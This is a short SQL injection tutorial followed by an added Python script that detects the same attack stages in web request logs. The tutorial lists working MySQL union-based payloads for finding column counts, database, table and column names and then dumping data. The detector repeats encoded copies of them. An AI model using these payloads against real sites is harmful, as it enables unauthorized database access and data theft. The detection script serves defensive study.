(1) First enter 1' to determine the injection type. If it is integer-type, the error usually looks like this: Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 0.000 sec;
If it is string-type, the error usually looks like this: Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 0.016 sec
(2) Determine the number of columns in the table
1' and 1=2 order by xxx # (keep incrementing xxx until an error occurs)
(3) Determine the database name (three columns are used as the example here)
1' and 1=2 union select 1, 2, database() #
(4) Determine the table names
1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
(5) Determine the column names
1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='<table you want to query>' #
(6) Retrieve the data
1' and 1=2 union select xxx,xxx from <table> #
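
Seen from the server side, steps (1) to (6) leave a recognizable sequence in request logs. The following is an added example, not part of the original page: it classifies logged parameter values by step and flags clients that hit two or more steps. The log tuples, addresses, stage names and function names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Stage signatures (hypothetical names), following the steps listed above.
STAGES = [
    ("quote_probe",  re.compile(r"^\s*\d+\s*'\s*$")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("schema_enum",  re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
]

def classify(raw_value):
    """Return the stage names whose signature matches one parameter value."""
    value = unquote_plus(raw_value)
    # Replace inline /* */ comments with a space before matching.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return [name for name, rx in STAGES if rx.search(value)]

def suspicious_clients(events, min_stages=2):
    """Group hits by client; report clients that touched >= min_stages distinct stages."""
    seen = defaultdict(list)
    for client, raw_value in events:
        for stage in classify(raw_value):
            if stage not in seen[client]:
                seen[client].append(stage)
    return {c: s for c, s in seen.items() if len(s) >= min_stages}

# Constructed sample: (client address, raw value of the `id` query parameter).
SAMPLE = [
    ("198.51.100.7", "1%27"),
    ("198.51.100.7", "1%27+order+by+3+%23"),
    ("198.51.100.7", "1%27+order+by+4+%23"),
    ("198.51.100.7", "1%27+and+1%3D2+union+select+1%2C2%2Cgroup_concat(table_name)"
                     "+from+information_schema.tables+where+table_schema%3Ddatabase()+%23"),
    ("203.0.113.20", "42"),
    ("203.0.113.20", "order+by+date"),  # benign sort value: no number after "by"
    ("203.0.113.21", "7%27"),           # one stray quote stays below the threshold
]

if __name__ == "__main__":
    for client, stages in suspicious_clients(SAMPLE).items():
        print(client, "->", ", ".join(stages))
```

Pattern matching of this kind only surfaces probing in logs; the injection itself is prevented by parameterized queries.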